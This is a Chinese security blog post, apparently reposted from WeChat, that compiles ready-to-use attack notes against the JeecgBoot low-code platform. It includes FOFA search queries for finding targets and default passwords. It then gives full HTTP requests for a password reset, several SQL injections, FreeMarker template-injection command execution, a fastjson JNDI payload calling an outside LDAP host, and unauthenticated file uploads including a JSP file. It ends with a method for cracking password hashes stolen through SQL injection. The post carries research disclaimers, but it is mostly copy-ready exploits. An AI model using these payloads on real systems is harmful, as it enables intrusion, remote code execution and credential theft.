“对我们感兴趣的话就点个关注吧”
免责声明:本文仅供安全研究与学习之用,严禁用于非法用途,违者后果自负。
前言
jeecg-boot漏洞笔记记录一下。
小白可以直接收藏下来学习一下很多poc我都直接给出来了,基本就是我的笔记。
如果,有不对的可以指正一下,一起学习。
jeecg-boot介绍
JeecgBoot是一款集成AI应用的,基于BPM流程的低代码平台,旨在帮助企业快速实现低代码开发和构建个性化AI应用!前后端分离架构Ant Design&Vue3,SpringBoot,SpringCloud Alibaba,Mybatis-plus,Shiro。强大的代码生成器让前后端代码一键生成,无需写任何代码! 引领AI低代码开发模式: AI生成->OnlineCoding-> 代码生成-> 手工MERGE, 帮助Java项目解决80%的重复工作,让开发更多关注业务,提高效率、节省成本,同时又不失灵活性!低代码能力:Online表单、表单设计、流程设计、Online报表、大屏/仪表盘设计、报表设计; AI应用平台功能:AI知识库问答、AI模型管理、AI流程编排、AI聊天等,支持含ChatGPT、DeepSeek、Ollama等多种AI大模型。
官网地址:https://jeecg.com开源项目地址:https://github.com/zhangdaiscott/jeecg-boot
资产测绘
fofa:
body="/sys/common/pdf/pdfPreviewIframe"title="Jeecg-Boot 快速开发平台" || body="积木报表"body="jeecg-boot"app="JEECG"icon_hash="1380908726"icon_hash="-250963920"
常见情况
加载动画
出现以下这几种情况基本可以确定是jeecg-boot,也可以通过接口或者图标等信息进行判定。
常见弱口令漏洞
admin/123456
jeecg/123456
admn/admin
test/test
demo/test
jeecg/jeecg123456
guest/guest
JeecgBoot passwordChange接口任意用户密码重置
GET /jeecg-boot/sys/user/passwordChange?username=admin&password=admin&smscode=&phone= HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: keep-alive
jeecg-boot-checkOnlyUser信息泄露漏洞
/jeecg-boot/sys/user/querySysUser?username=admin
Jeecg-Boot 2.4.5及之前版本存在不安全权限漏洞。攻击者可利用该漏洞通过uri:/sys/user/checkOnlyUser?username=admin提升权限并查看敏感信息。
jeecg-boot-目录遍历漏洞
/jeecg-boot/online/cgform/head/fileTree?_t=1632524014&parentPath=/
低权限账号访问直接返回服务器文件目录信息
Jeecg-boot 3.4.4 /sys/dict/queryTableData SQL注入
在Jeecg-boot 3.4.4中曾发现分类为致命的漏洞。 此漏洞会影响未知代码文件/sys/dict/queryTableData。 手动调试的不合法输入可导致 SQL注入。POST /jeecg-boot/jmreport/qurestSql HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13Content-Type: application/json; charset=utf-8Content-Length: 127Host:Connection: closeAccept-Encoding: gzip, deflate{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select md5(123456))),1)) or '%%' like '"}
JeecgBoot onlDragDatasetHead/getTotalData SQL注入
JeecgBoot v3.7.1 通过组件 /onlDragDatasetHead/getTotalData 存在 SQL 注入漏洞。POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/2Host:Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Content-Type: application/jsonContent-Length: 281{"tableName":"sys_user","compName":"test","condition":{"filter":{}},"config":{"assistValue":[],"assistType":[],"name":[{"fieldName":"concat(0x7e,version(),0x7e)","fieldType":"string"},{"fieldName":"id","fieldType":"string"}],"value":[{"fieldName":"id","fieldType":"1"}],"type":[]}}
jeecg-boot-getDictItemsByTable SQL注入漏洞
JeecgBoot是一款基于代码生成器的低代码开发平台,它专为简化Java项目开发流程、提高开发效率而设计。攻击者通过注入恶意的SQL代码,能够窃取、篡改或删除数据库中的数据,甚至执行系统命令,对网站和服务器造成严重影响。
GET /jeecg-boot/sys/ng-alain/getDictItemsByTable/'%20from%20sys_user/*,%20'/x.js HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brSec-Purpose: prefetchConnection: closePriority: u=6
Jeecg-Boot /jmreport/show SQL注入漏洞
jeecg-boot 3.5.0和3.5.1 版本存在安全漏洞,该漏洞源于 /jeecg-boot/jmreport/show 接口的 id 参数存在SQL注入漏洞。POST /jeecg-boot/jmreport/show HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36Connection: closeContent-Length: 182Content-Type: application/json;charset=UTF-8Accept-Encoding: gzip{"id": "961455b47c0b86dc961e90b5893bff05","apiUrl": "","params": {"id ": "1 ' or ' % 1 % ' like (updatexml(0x3a,concat(1,(version())),1)) or ' % % ' like '"}}
jeecg-boot sys/duplicate/check SQL注入
/sys/duplicate/check 接口SQL注入,checksql可以被绕过,该漏洞需要进行身份认证。GET /jeecg-boot/sys/duplicate/check?tableName=v3_hello&fieldName=1+and%09if(user(%20)='root@localhost',sleep(0),sleep(0))&fieldVal=1&dataId=asd HTTP/1.1Host:Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36Connection: closeCache-Control: max-age=0X_ACCESS_TOKEN: eyJ0eXAi0iJKV1QiLCJhbGci0iJIUzI1Ni J9.eyJleHAi0jE2NzA2NjUy0TQsInVzZXJ uYW1lIjoiYWRtaW4i fQ.bL0e7k3rbFEewdMoL2YfPCo9rtzx7g9 KLjB2LK-J9SUGET /jeecg-boot/sys/duplicate/check?tableName=sys_log&fieldName=1+and%09if(user(%20)='root@localhost',sleep(0),sleep(10))&fieldVal=1000&dataId=2000 HTTP/1.1Host:Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36Connection: closeCache-Control: max-age=0X_ACCESS_TOKEN: eyJ0eXAi0iJKV1QiLCJhbGci0iJIUzI1Ni J9.eyJleHAi0jE2NzA2NjUy0TQsInVzZXJ uYW1lIjoiYWRtaW4i fQ.bL0e7k3rbFEewdMoL2YfPCo9rtzx7g9 KLjB2LK-J9SU
JeecgBoot jmreport/loadTableData SSTI模板注入漏洞
jeecg-boot 版本 3.5.3 中的 SSTI 注入漏洞允许远程攻击者通过对 /jmreport/loadTableData 组件进行精心设计的 HTTP 请求执行任意代码。POST /jeecg-boot/jmreport/loadTableData HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/json;charset=UTF-8X-Sign: AD0488642A880C68C8E3551C3BE0F6F5X-TIMESTAMP: 1699726206096X-Access-Token: nulltoken: nullJmReport-Tenant-Id: nullContent-Length: 167Connection: closeCookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8=1699726144; Hm_lpvt_5819d05c0869771ff6e6a81cdec5b2e8=1699726162{"dbSource":"","sql":"select '<#assign value="freemarker.template.utility.Execute"?new()>${value("whoami")}'","tableName":"test_demo);","pageNo":1,"pageSize":10}
JeecgBoot AviatorScript表达式注入
积木报表软件存在AviatorScript代码注入RCE漏洞。使用接口/jmreport/save处在text中写入AviatorScript表达式。访问/jmreport/show触发AviatorScript解析从而导致命令执行。POST /jeecg-boot/jmreport/queryFieldBySql?previousPage=xxx&jmLink=YWFhfHxiYmI=&token=123 HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: application/json, text/plain, */*Content-Type: application/jsonContent-Length: 108{"sql":"select 'result:<#assign ex="freemarker.template.utility.Execute"?new()> ${ex("whoami ") }'"}
jeecg-boot后台/sysMessageTemplate/sendMsg接口freemaker模板注入
jeecg-boot的Freemarker模板注入导致远程命令执行, 远程攻击者可利用该漏洞调用在系统上执行任意命令。1、添加一个测试模板POST /jeecg-boot/sys/message/sysMessageTemplate/add HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brX-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE3MzYyMTcyNDQsInVzZXJuYW1lIjoiYWRtaW4ifQ.-Z6FINUMTWQkOR6u009cde9BFyb-l65VWRhUXDz_2aoTenant-Id: 0Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-sitePriority: u=0Te: trailersConnection: closeContent-Type: application/json;charset=UTF-8Content-Length: 141{"templateType":"1","templateCode":"5","templateName":"test111","templateContent":"${"freemarker.template.utility.Execute"?new()("id")}"}2、发送模板POST /jeecg-boot/sys/message/sysMessageTemplate/sendMsg HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brX-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE3MzYyMTcyNDQsInVzZXJuYW1lIjoiYWRtaW4ifQ.-Z6FINUMTWQkOR6u009cde9BFyb-l65VWRhUXDz_2aoTenant-Id: 0Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-sitePriority: u=0Te: trailersConnection: closeContent-Type: application/json;charset=UTF-8Content-Length: 64{"templateCode":"5","testData":"{}","receiver":"","msgType":"1"}3、执行模板并查看返回结果GET /jeecg-boot/sys/message/sysMessage/list?_t=1732776144&column=createTime&order=desc&field=id,,,esTitle,esContent,esReceiver,esSendNum,esSendStatus_dictText,esSendTime,esType_dictText,action&pageNo=1&pageSize=10 HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brX-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE3MzYyMTcyNDQsInVzZXJuYW1lIjoiYWRtaW4ifQ.-Z6FINUMTWQkOR6u009cde9BFyb-l65VWRhUXDz_2aoTenant-Id: 0Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-sitePriority: u=0Te: trailersConnection: closeAccept-Encoding: gzip
Jeecg-jeecgFormDemoController存在JNDI代码执行漏洞
JEECG 4.0 及之前版本中,由于 /api 接口鉴权时未过滤路径遍历,攻击 者可构造包含 ../ 的 url 绕过鉴权。 因为依赖 1.2.31 版本的 fastjson, 该版本存在反序列化漏洞。攻击者可对/api/../jeecgFormDemoController.do?interfaceTest 接口进行 jndi 注入攻 击实现远程代码执行。POST /api/../jeecgFormDemoController.do?interfaceTest= HTTP/1.1Host:Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brcmd: whoamiAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 77serverUrl=http://xxxxxxxx:8877/jeecg.txt&requestBody=1&requestMethod=GET创建如下远程文件,其内容为fastjson代码执行的payload{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://10.66.64.89:1389/8orsiq","autoCommit":true}}
jeecg-boot/jmreport/upload接口存在未授权任意文件上传
测试发现/jeecg-boot/jmreport/upload接口存在未授权任意文件上传,经实测发现上传接口未授权,但访问上传后的文件需要登录,即带token。POST /jeecg-boot/jmreport/upload HTTP/1.1User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)Accept: */*Accept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryyfyhSCMs9cajzFD4Cache-Control: no-cachePragma: no-cacheHost:Content-Length: 1476------WebKitFormBoundaryyfyhSCMs9cajzFD4Content-Disposition: form-data; name="file"; filename="11111.txt"Content-Type: text/html<%! 1111>------WebKitFormBoundaryyfyhSCMs9cajzFD4Content-Disposition: form-data; name="fileName"11111.txt------WebKitFormBoundaryyfyhSCMs9cajzFD4Content-Disposition: form-data; name="biz"excel_online------WebKitFormBoundaryyfyhSCMs9cajzFD4--
Jeecg-commonController.do文件上传
由于 /api 接口鉴权时未过滤路径遍历,攻击者可构造包含 ../ 的url绕过鉴权。攻击者可构造恶意请求利用 commonController 接口进行文件上传攻击实现远程代码执行。POST /jeecg-boot/api/../commonController.do?parserXml HTTP/1.1Host:Accept-Encoding: gzip, deflateContent-Length: 360User-Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwteiConnection: close------WebKitFormBoundarygcflwteiContent-Disposition: form-data; "name="name"zW9YCa.png------WebKitFormBoundarygcflwteiontent-Disposition: form-data; name="documentTitle"blank------WebKitFormBoundarygcflwteiContent-Disposition: form-data; name="file"; filename="zW9YCa.jsp"Content-Type: image/png11111------WebKitFormBoundarygcflwtei--
常见jeecg-boot常见接口
/v2/api-docs/jeecg-boot/online/cgform/head/fileTree?_t=1632524014&parentPath=//jeecg-boot/sys/user/querySysUser?username=admin/jeecg//api/sys//sys/user/v2/api-docs/swagger-ui.html/env/actuator/mappings/metrics/beans/configprops/actuator/metrics/actuator/mappings/actuator/beans/actuator/configprops/actuator/httptrace/druid/index.html/druid/sql.html/druid/weburi.html/druid/websession.html/druid/weburi.json/druid/websession.json/druid/login.html/api/config/list/sys/user/list/sys/user/add/sys/user/edit/sys/user/queryById/sys/user/changePassword/sys/role/list/sys/role/add/sys/role/edit/sys/role/queryPermission/v2/api-docs/v1/api-docs/api-docs/sys/menu/list/sys/menu/add/sys/menu/edit/sys/menu/delete/sys/depart/list/sys/depart/add/sys/depart/edit/sys/depart/delete/online/cgform/list/online/cgform/add/online/cgform/edit/online/cgform/delete/online/cgform/fields/{tableName}/online/cgform/table/list/online/cgform/table/sync/online/cgform/generateCode/sys/dict/list/sys/dict/add/sys/dict/edit/sys/dict/delete/act/process/list/act/process/deploy/act/task/list/act/task/complete/act/task/history/sys/common/upload/sys/common/download/{fileId}/sys/common/view/{fileId}/monitor/redis/info/monitor/server/info/api/test/demo/list/api/test/demo/add/sys/log/list/sys/log/delete/sys/sms/send/sys/sms/list/api/test/demo/edit/api/test/demo/delete/report/loadReport/{code}/chart/api/getChartData/api/test/demo/queryById/act/process/delete/sys/dict/loadDictItems/{dictCode}/jeecg-boot/sys/getLoginQrcode/jeecg-boot/sys/getQrcodeToken/jeecg-boot/sys/login/jeecg-boot/sys/phoneLogin/jeecg-boot/sys/scanLoginQrcode/jeecg-boot/drag/onlDragDataSource/add/jeecg-boot/drag/onlDragDataSource/delete/jeecg-boot/drag/onlDragDataSource/deleteBatch/jeecg-boot/drag/onlDragDataSource/edit/jeecg-boot/drag/onlDragDataSource/list/jeecg-boot/drag/onlDragDataSource/queryById/jeecg-boot/drag/onlDragDatasetHead/add/jeecg-boot/drag/onlDragDatasetHead/addGroup/jeecg-boot/drag/onlDragDatasetHead/delDragDataSetHeadGroup/jeecg-boot/drag/onlDragDatasetHead/delete/jeecg-boot/drag/onlDragDatasetHead/edit/jeecg-boot/drag/onlDragDatasetHead/queryById/jeecg-boot/drag/onlDragDatasetHead/updateGroup/jeecg-boot/drag/onlDragDatasetParam/add/jeecg-boot/drag/onlDragDatasetParam/delete/jeecg-boot/druid/login.html/jeecg-boot/drag/onlDragDatasetParam/deleteBatch/jeecg-boot/drag/onlDragDatasetParam/edit/jeecg-boot/actuator/httptrace/jeecg-boot/drag/onlDragDatasetParam/list/jeecg-boot/drag/onlDragDatasetParam/queryById/jeecg-boot/drag/websocket/sendData/jeecg-boot/sys/checkRule/add/jeecg-boot/sys/checkRule/checkByCode/jeecg-boot/sys/checkRule/delete/jeecg-boot/sys/checkRule/deleteBatch/jeecg-boot/sys/checkRule/edit/jeecg-boot/sys/checkRule/list/jeecg-boot/sys/checkRule/queryById/jeecg-boot/sys/comment/add/jeecg-boot/sys/comment/addFile/jeecg-boot/sys/comment/addText/jeecg-boot/sys/comment/delete/jeecg-boot/sys/comment/deleteBatch/jeecg-boot/sys/comment/deleteOne/jeecg-boot/sys/comment/edit/jeecg-boot/sys/comment/fileList/jeecg-boot/sys/comment/list/jeecg-boot/sys/comment/listByForm/jeecg-boot/sys/comment/queryById/jeecg-boot/sys/dataSource/add/jeecg-boot/sys/dataSource/delete/jeecg-boot/sys/dataSource/deleteBatch/jeecg-boot/sys/dataSource/edit/jeecg-boot/sys/dataSource/list/jeecg-boot/sys/dataSource/queryById/jeecg-boot/sys/dictItem/dictItemCheck/jeecg-boot/sys/duplicate/check/jeecg-boot/sys/files/add/jeecg-boot/sys/files/delete/jeecg-boot/sys/files/deleteBatch/jeecg-boot/sys/files/edit/jeecg-boot/sys/files/list/jeecg-boot/sys/files/queryById/jeecg-boot/sys/fillRule/add/jeecg-boot/sys/fillRule/delete/jeecg-boot/sys/fillRule/deleteBatch/jeecg-boot/sys/fillRule/edit/jeecg-boot/sys/fillRule/list/jeecg-boot/sys/fillRule/queryById/jeecg-boot/sys/formFile/add/jeecg-boot/sys/formFile/delete/jeecg-boot/sys/formFile/deleteBatch/jeecg-boot/sys/formFile/edit/jeecg-boot/sys/formFile/list/jeecg-boot/sys/formFile/queryById/jeecg-boot/sys/position/add/jeecg-boot/sys/position/delete/jeecg-boot/sys/position/deleteBatch/jeecg-boot/sys/position/edit/jeecg-boot/sys/position/list/jeecg-boot/sys/position/queryByCode/jeecg-boot/sys/position/queryById/jeecg-boot/sys/quartzJob/pause/jeecg-boot/sys/quartzJob/resume/jeecg-boot/sys/randomImage//jeecg-boot/sys/sysDepartPermission/add/jeecg-boot/sys/sysDepartPermission/delete/jeecg-boot/sys/sysDepartPermission/deleteBatch/jeecg-boot/sys/sysDepartPermission/edit/jeecg-boot/sys/sysDepartPermission/list/jeecg-boot/sys/sysDepartPermission/queryById/jeecg-boot/sys/sysDepartRole/add/jeecg-boot/sys/sysDepartRole/delete/jeecg-boot/sys/sysDepartRole/deleteBatch/jeecg-boot/sys/sysDepartRole/edit/jeecg-boot/sys/sysDepartRole/list/jeecg-boot/sys/sysDepartRole/queryById/jeecg-boot/sys/sysRoleIndex/add/jeecg-boot/sys/sysRoleIndex/delete/jeecg-boot/sys/sysRoleIndex/deleteBatch/jeecg-boot/sys/sysRoleIndex/edit/jeecg-boot/sys/sysRoleIndex/list/jeecg-boot/sys/sysRoleIndex/queryByCode/jeecg-boot/sys/sysRoleIndex/queryById/jeecg-boot/test/dynamic/test1/jeecg-boot/test/jeecgDemo/add/jeecg-boot/test/jeecgDemo/delete/jeecg-boot/test/jeecgDemo/deleteBatch/jeecg-boot/test/jeecgDemo/edit/jeecg-boot/test/jeecgDemo/list/jeecg-boot/test/jeecgDemo/queryById/sys/user/delete/jeecg-boot/sys/user/addSysUserRole/sys/role/delete/user/register
常见jeecg-boot漏洞利用工具
https://github.com/Framework-vulnerability-tool/jeecg工具介绍jeecg综合漏洞利用工具,程序采用javafx开发,环境JDK 1.8 声明:仅用于授权测试,用户滥用造成的一切后果和作者无关 请遵守法律法规! 漏洞收录如下:jeecg-boot queryFieldBySql远程命令执行漏洞jeecg-boot testConnection远程命令执行漏洞JeecgBoot jmreport/loadTableData SSTI模板注入漏洞jeecg-boot-queryTableData-sqli注入漏洞jeecg-boot-getDictItemsByTable-sqli注入漏洞Jeecg-Boot qurestSql-SQL注入漏洞jeecg-boot commonController 任意文件上传漏洞jeecg-boot jmreport任意文件上传漏洞jeecg-boot-querySysUser信息泄露漏洞jeecg-boot-checkOnlyUser信息泄露漏洞jeecg-boot-httptrace信息泄露漏洞jeecg-boot-任意文件下载漏洞jeecg-boot-jeecgFormDemoController漏洞jeecg-boot-v2 P3 Biz Chat任意文件读取漏洞jeecg-boot-v2 sys/duplicate/check注入漏洞jeecg-boot-v2 AviatorScript表达式注入漏洞
有时候我们检测到了sql注入漏洞但是无法getshell,可以另辟蹊径,直接读取密码文件然后进行解密。
https://github.com/ssrsec/JeecgBoot-offline-brute
有sqli的端点,但是无法rce以及进一步获得权限,我们可以尝试通过sqli获取凭据从而获得用户级权限
数据库中
password字段是加密的,通过查看源码发现密码使用PBE进行加密,关键是用明文密码作为对称加密key的一个环节,所以没办法直接逆向解密,但是可以离线爆破。
实现过程
过程非常简单,直接捞出加密过程,然后通过sqli将数据库中的用户名、加密后的密码、salt取出来,然后直接用字典跑就行~
先取出对应的数据,放到根目录下的data.json,然后准备一个字典,放到根目录下的pass.txt
java -jar JeecgBoot-offline-brute.jar
为爱发电,随手点个「推荐」吧!
原文始发于微信公众号(玄武盾网络技术实验室):Jeecg-boot常见漏洞汇总
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论